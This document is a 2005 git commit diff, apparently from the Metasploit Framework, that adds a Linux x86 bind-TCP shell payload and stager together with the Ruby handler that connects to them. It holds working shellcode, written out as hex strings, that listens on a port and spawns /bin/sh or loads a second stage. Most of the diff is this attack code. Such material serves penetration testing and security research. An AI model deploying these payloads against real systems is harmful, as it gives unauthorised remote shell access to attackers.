bind tcp stager/inline for linux

git-svn-id: file:///home/svn/incoming/trunk@2776 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Matt Miller 2005-07-17 07:43:24 +00:00
parent 46c2cd2ac1
commit cc32a21386
6 changed files with 213 additions and 2 deletions

View File

@ -117,7 +117,7 @@ module Handler
# The amount of time to wait for a session to come in.
#
def wfs_delay
1
2
end
#

View File

@ -0,0 +1,112 @@
module Msf
module Handler
###
#
# BindTcp
# -------
#
# This module implements the Bind TCP handler. This means that
# it will attempt to connect to a remote host on a given port for a period of
# time (typically the duration of an exploit) to see if a the payload has
# started listening. This can tend to be rather verbose in terms of traffic
# and in general it is preferable to use reverse payloads.
#
###
module BindTcp
include Msf::Handler
def self.handler_type
return "bind_tcp"
end
def initialize(info = {})
super
register_options(
[
Opt::RHOST,
Opt::LPORT(4444)
], Msf::Handler::BindTcp)
self.conn_threads = []
end
#
# No setup to speak of
#
def setup_handler
end
#
# Kills off the connection threads if there are any hanging around.
#
def cleanup_handler
# Kill any remaining handle_connection threads that might
# be hanging around
conn_threads.each { |thr|
thr.kill
}
end
#
# Starts monitoring for an outbound connection to become established.
#
def start_handler
listener_thread = Thread.new {
client = nil
print_status("Started bind handler")
# Keep trying to connect
callcc { |ctx|
while true
begin
client = Rex::Socket::Tcp.create(
'PeerHost' => datastore['RHOST'],
'PeerPort' => datastore['LPORT'].to_i,
'Comm' => comm)
rescue Rex::ConnectionRefused
# Connection refused is a-okay
rescue
wlog("Exception caught in bind handler: #{$!}")
end
ctx.call if (client)
# Wait a second before trying again
Rex::ThreadSafe.sleep(0.5)
end
}
# Valid client connection?
if (client)
# Start a new thread and pass the client connection
# as the input and output pipe. Client's are expected
# to implement the Stream interface.
conn_threads << Thread.new {
begin
handle_connection(client)
rescue
elog("Exception raised from BindTcp.handle_connection: #{$!}")
end
}
end
}
end
#
# Nothing to speak of.
#
def stop_handler
end
protected
attr_accessor :conn_threads
end
end
end

View File

@ -23,6 +23,13 @@ class Rex::Socket::Tcp < Rex::Socket
#
##
#
# Creates the client using the supplied hash
#
def self.create(hash)
self.create_param(Rex::Socket::Parameters.from_hash(hash))
end
#
# Wrapper around the base socket class' creation method that automatically
# sets the parameter's protocol to TCP

View File

@ -0,0 +1,44 @@
require 'msf/core'
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'
module Msf
module Payloads
module Singles
module Linux
module X86
module ShellBindTcp
include Msf::Payload::Single
def initialize(info = {})
super(merge_info(info,
'Name' => 'Linux Command Shell, Bind TCP Inline',
'Version' => '$Revision$',
'Description' => 'Listen for a connection and spawn a command shell',
'Author' => [ 'skape', 'vlad902' ],
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::BindTcp,
'Session' => Msf::Sessions::CommandShell,
'Payload' =>
{
'Offsets' =>
{
'LPORT' => [ 0x14, 'n' ],
},
'Payload' =>
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96" +
"\x43\x52\x66\x68\xbf\xbf\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56" +
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1" +
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0" +
"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" +
"\x89\xe1\xcd\x80"
}
))
end
end
end end end end end

View File

@ -8,7 +8,7 @@ module Singles
module Linux
module X86
module Shell
module ShellReverseTcp
include Msf::Payload::Single

View File

@ -0,0 +1,48 @@
require 'msf/core'
require 'msf/core/handler/bind_tcp'
module Msf
module Payloads
module Stagers
module Linux
module X86
###
#
# BindTcp
# -------
#
# Linux bind TCP stager.
#
###
module BindTcp
include Msf::Payload::Stager
def initialize(info = {})
super(merge_info(info,
'Name' => 'Bind TCP Stager',
'Version' => '$Revision$',
'Description' => 'Listen for a connection',
'Author' => 'skape',
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::BindTcp,
'Stager' =>
{
'Offsets' =>
{
'LPORT' => [ 0x14, 'n' ],
},
'Payload' =>
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96" +
"\x43\x52\x66\x68\xbf\xbf\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56" +
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1" +
"\xb0\x66\xcd\x80\x93\xb6\x0c\xb0\x03\xcd\x80\x89\xdf\xff\xe1"
}
))
end
end
end end end end end